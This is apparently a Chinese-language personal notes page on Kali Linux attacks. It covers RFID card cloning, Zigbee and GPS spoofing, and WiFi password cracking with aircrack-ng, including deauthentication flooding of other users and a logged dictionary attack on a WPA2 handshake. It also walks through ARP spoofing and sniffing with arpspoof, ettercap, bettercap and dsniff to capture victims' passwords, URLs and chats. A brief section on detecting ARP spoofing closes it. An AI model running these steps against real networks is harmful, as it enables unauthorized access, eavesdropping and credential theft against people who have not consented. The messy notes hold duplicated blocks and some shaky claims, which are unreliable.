玩转kali内网渗透篇
玩转kali内网渗透篇
科普知识
M1 S50 国内最为常见,被称IC卡,食堂卡M1 UID 根据M1S50做的变种卡,与M1 S50一样,但是卡0扇区可以修改。因此UID可以修改,被称中国魔术卡
UID---->>FUID(一生只能修改一次)---->>CUID(能修改多次,有奇偶校验)
ID 卡 是俗称全名
T5577可以变身为ID卡也可以变为HID卡
现场嗅探:需要PM3的天线模拟射频卡获取密钥
Proxmark3 Easy GUI
一键自动解析
低功耗蓝牙术语及概念
Zigbee 低速但是传播广泛。会引起窃听攻击,序列攻击,密钥攻击
可以使用killerbee工具套件实施无限的攻击,也可以使用zbgoodfind,goodFET来实施物理攻击
无线蜂窝电话通讯协议
2G/3G/4G/5G
伪基站(太敏感??)
SDR#1.0.0.1361
查看频率峰值FM
使用hackrf欺骗GPS信号
gps-sdr-sim
-e 选择的通讯方式()
WPA加密 :四种认证方式
WPA、WPA2、WPA-PSK、WPA2-PSK
彩虹表跑企业级的那些密码,家用的可以生成当地手机号+出生日期
kali有自带的字典
cd/usr/share/wordlists/
kali破解工具
aircrack
wifiite
reaver
fern wifi crack
fluxion
hijacker
aircrack-ng破解密码
service network-manager restart(重启网络)ifconfig wlan0 up (启动无线网卡)
airmon-ng start wlan0(监听模式)
airodump-ng wlan0mon(显示附近WIFI)
airodump-ng -c 1 -w 123 --bssid xx:xx:xx:xx:xx wlan0mon(显示链接WIFI的客户端) //-c可以不用选,自动判断频道 -w 代表写入 (123-01.cap) 这个后台别关!!!!!!!!!攻击掉线后会出现握手包,以前我就有试过
aireplay-ng wlan0mon(做坏事,踢掉别人的网络)//deauth洪水攻击,没有防止踢掉线的
aireplay-ng --deauth 2 -a 无线路由器AP(bssid) -c 连接路由器AP wlan0mon
手机掉了已经连不上wifi但是bssid还存在
aircrack-ng a2 -b FC:D7:33:D7:5E:72 -w /root/桌面/ALL/tools/dictory/密码/弱口令.txt -test-01.cap
(成功,很简单,当初为什么不找点找到这个网站http://www.shiyanbar.com/course-video/watchVideo/cid/462/vid/2170)
这里注意不能破解wpa2的密码 今天刚试过
BSSID STATION PWR Rate Lost Frames Probe
54:36:9B:1C:A0:FB 34:78:D7:1B:8A:5E -80 0e- 0e 875 5210
54:36:9B:1C:A0:FB 04:56:04:30:E2:85 -80 0e- 0e 636 107186
CH 5 ][ Elapsed: 4 mins ][ 2018-02-12 16:17
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
54:36:9B:1C:A0:FB -60 100 1738 111663 655 5 54e WPA2 CCMP PSK YYYYYY
BSSID STATION PWR Rate Lost Frames Probe
54:36:9B:1C:A0:FB 34:78:D7:1B:8A:5E -78 0e- 1 875 5213
54:36:9B:1C:A0:FB 04:56:04:30:E2:85 -74 0e- 1e 728 107422
CH 5 ][ Elapsed: 8 mins ][ 2018-02-12 16:20 ][ WPA handshake: 54:36:9B:1C:A0:FB
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
54:36:9B:1C:A0:FB -60 78 3366 177909 801 5 54e WPA2 CCMP PSK YYYYYY
BSSID STATION PWR Rate Lost Frames Probe
54:36:9B:1C:A0:FB 04:56:04:30:E2:85 -76 0e- 1e 105 173437
54:36:9B:1C:A0:FB 34:78:D7:1B:8A:5E -78 0e- 1 1 7373
root@kali2:~# aircrack-ng -w /root/桌面/ALL/tools/dictory/密码/400W常用密码整理.txt YYYYY-01.cap Opening YYYYY-01.cap
Read 313972 packets.
# BSSID ESSID Encryption
1 54:36:9B:1C:A0:FB YYYYYY WPA (1 handshake)
Choosing first network as target.
Opening YYYYY-01.cap
Reading packets, please wait...
Aircrack-ng 1.2 rc4
[01:02:42] 1989596/2202071 keys tested (610.47 k/s)
Time left: 0 seconds 90.35%
Current passphrase: 43219999
Master Key : CB 8D 70 17 6A 73 5E 29 AF 0C 44 0D 5E CE E9 0C
52 D8 18 E4 C4 7A EE F4 A7 F5 64 7A 54 9D 4E EA
Transient Key : 70 41 5C 3B A7 76 D1 EE 66 34 9E 98 2B A2 0E ED
44 95 3B 9D BE 3A 47 9E 61 DE 58 68 3A 96 EC E3
BE 35 AC 4E 1D A6 D3 2D B2 1E D0 3A 6D 9C 54 EF
41 F0 11 C9 8F 17 98 7F 7E 84 36 38 90 C0 14 66
EAPOL HMAC : C1 C5 2C 85 02 8B A0 59 55 5D 58 EB BA 31 BF CF
Passphrase not in dictionary
ARP欺骗
{
先选择网卡,主动转发,让目标可以上网
ARP欺骗设置
不管访问什么页面都显示“haha0”
}
{
bettercap
bettercap -x扫描局域网的主机
显示 局域网内账号密码验证码
bettercap --kill -X
}
先选择网卡,主动转发,让目标可以上网
ARP欺骗设置
不管访问什么页面都显示“haha0”
}
{
bettercap
bettercap -x扫描局域网的主机
显示 局域网内账号密码验证码
bettercap --kill -X
}
我自己的实战
了解自己kali的ip是啥?eth0、inet6、ether、lo
root@kali:~# ifconfig
eth0: flags=4099 mtu 1500
ether ************* txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73 mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10
loop txqueuelen 1 (Local Loopback)
RX packets 20 bytes 1116 (1.0 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 20 bytes 1116 (1.0 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlan0: flags=4163 mtu 1500
inet 192.168.0.104 netmask 255.255.255.0 broadcast 192.168.0.255
inet6 ************** prefixlen 64 scopeid 0x20
ether 00:13:ef:b0:10:14 txqueuelen 1000 (Ethernet)
RX packets 39 bytes 4169 (4.0 KiB)
RX errors 0 dropped 8 overruns 0 frame 0
TX packets 17 bytes 2566 (2.5 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 (以上为kali虚拟机)
无线局域网适配器 WLAN:
连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : ****************
IPv4 地址 . . . . . . . . . . . . : 192.168.0.102
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . : **********
192.168.0.1(以上为本机地址)
我们需要启用IP转发,输入下面命令(PS:利用Linux主机的路由功能):
root@bt:~# cat /proc/sys/net/ipv4/ip_forward
0
root@bt:~# echo 1 >> /proc/sys/net/ipv4/ip_forward
root@bt:~# cat /proc/sys/net/ipv4/ip_forward
1下面的攻击我使用ARPspoof,来演示ARPspoofing攻击。这是一个不错的开源工具,可以用来执行ARP欺骗攻击
root@kali:~# arpspoof -h(可以查看arpspoof版本)
Version: 2.4
Usage: arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host下面的命令是利用ARP毒化,重定向受害者的流量传送给攻击者。
root@bt:~# arpspoof -i eth0 -t 192.168.0.1 127.0.0.1这里受害者的流量ip总是不对,没有进行下去
懂了 这里说的是 要与被欺骗主机不同网段,我换成桥接试试(桥接就断网)
换无线网卡试试
你的虚拟机kali是用的主机win7的地址,所以不能攻击。
如果是win7用无线网连接的话你可以单独用usb网卡连接kali
之后win7和kali是不同网卡同网段了,就可以相互进行arp欺骗
arpspoof -i wlan0 -t 192.168.0.102 192.168.0.1成功执行!!!!!!!!!
arpspoof -i wlan0 -t 192.168.0.1 192.168.0.104
{
arpspoof -h出来的结果我感觉是这么解读的-t 指定arp毒化数据发往的目标IP,host就是本机要仿冒的IP地址,比如,执行:
arpspoof -i wlan0 -t 192.168.1.101 192.168.1.1
的作用是告诉101,我这里是网关,你的数据交给我转发,然后,
arpspoof -i wlan0 -t 192.168.1.11 192.168.1.101
的作用是告诉真正的网关,我这里是101,101的数据交给我就对了
再结合之前的ip_forward转发就对了
只是个人想法,找了好多也没找到一个解释它的用法的
}
arpspoof -i eth0 -t 【被攻击IP】 【网关IP】
arpspoof -i eth0 -t 【网关IP】 【被攻击IP】
两个都要执行。
命令解释arpspoof -i eth0 -t IP1 IP2
欺骗ip2,告诉IP2你的计算机IP是IP1.
这样分析一下,你就理解ARP欺骗了
root@bt:~# driftnet -i eth0 //下面的没做实验,因为上一步就断了
通过使用Ettercap来进行ARP欺骗
Ettercap是一个多用途的开源工具,可以用来执行嗅探、主机分析等。在本教程中,我们使用中间人攻击进行ARP欺骗,ettercap有些不错的插件,可以增强中间人攻击。Ettercap中最重要的插件如下:
dns_spoof (执行DNS欺骗攻击)
Dos_attack(对受害主机进行拒绝服务攻击)
Chk_poison(检测是否成功进行了攻击)
Repoison_arp(顾名思义,修复ARP)
Ettercap
-t 只监听这种协议-T ettercap检查pcap文件(脱机监听)
-q 安静(不回显)
-M 这是一个重要的参数,他会告诉ettercap执行中间人攻击,使用这个参数很简单,如 -M method
Ettercap -T -q -M ARP//
Dsniff&ARP欺骗攻击
Dsniff是一个非常强大的工具套件,它被用来进行渗透测试。它被用来实施嗅探、网络分析等。它能够捕捉各种协议。ARPspoof和driftnet也是dsniff套件的一部分,当然还有其他套件,如:Msgsnarf
Urlsnarf
Mailsnarf
Filesnarf
dnsspoof
在如下攻击场景中:
攻击者IP: 192.168.1.12
被攻击主机IP:192.168.1.6
路由(网关)IP:192.168.1.1
让我们开始进行ARPspoof IP转发攻击:
root@bt:~# echo 1 >> /proc/sys/net/ipv4/ip_forwardroot@bt:~# arpspoof -i eth0 -t 192.168.1.6 192.168.1.1root@bt:~# arpspoof -i eth0 -t 192.168.1.1 192.168.1.12
我刚刚启用端口转发,之后使用arpspoof(dsniff的一个插件)来执行ARP毒化攻击。开启dsniff来捕获已知协议获取密码。
root@bt:~# dsniff -i eth0dsniff: listening on eth0如图所示,dsniff成功从受害者主机上捕获了FTP的用户名和密码,尽管这个密码是不正确的,但dsniff可以捕获受害者发送的信息。
因为攻击者的主机作为了默认的路由器(因为进行了ARP欺骗),因此受害主机传输的数据经过攻击者,攻击者很容易可以嗅探到受害者发送的信息。我们可以arpspoof所有网段内的主机,但我们的示例中只ARP欺骗了单个主机。你可以试试其他的dsniif工具,像urlsnarf。
root@bt:~# urlsnarf -i eth0
urlsnarf: listening on eth0 [tcp port 80 or port 8080 or port 3128]它能捕获受害者访问网站的详细信息。你可以试试msgsnarf捕获即时聊天会话信息,我的意思是如果用户通过雅虎聊天或者任何IRC频道,通过msgsnarf可以捕获受害者所有的谈话,结束攻击需要结束arpspoof。
root@bt:~# killall arpspoof如何防止ARP毒化攻击
ARP欺骗是一种非常危险的攻击,攻击者可以很容易的探取受害者主机证书和其他机密信息。因此如何发现且保护ARP毒化受害者攻击呢?其实这是很容易识别的,如果你是受害主机,可以使用ARP命令查看。
正如我们可以对上面所讨论IP地址被ARP欺骗攻击之前和之后的区别进行比较,能够验证你是否是受害者。其他的方法是设置ARP缓存表为静态,但不推荐。因为在一个大型的网络中,它要花费很长的时间手动设置,这是不可能的。
这里有很多工具可以用来帮助你判断是否受到了ARP欺骗,而且有几种工具是可用的,它可以保护你的计算机免受ARP毒化并且检测出ARP缓存表的更变,一些比较出名的工具:
ARPon
ARP Wath
XARP
后续添加msfconsole内容....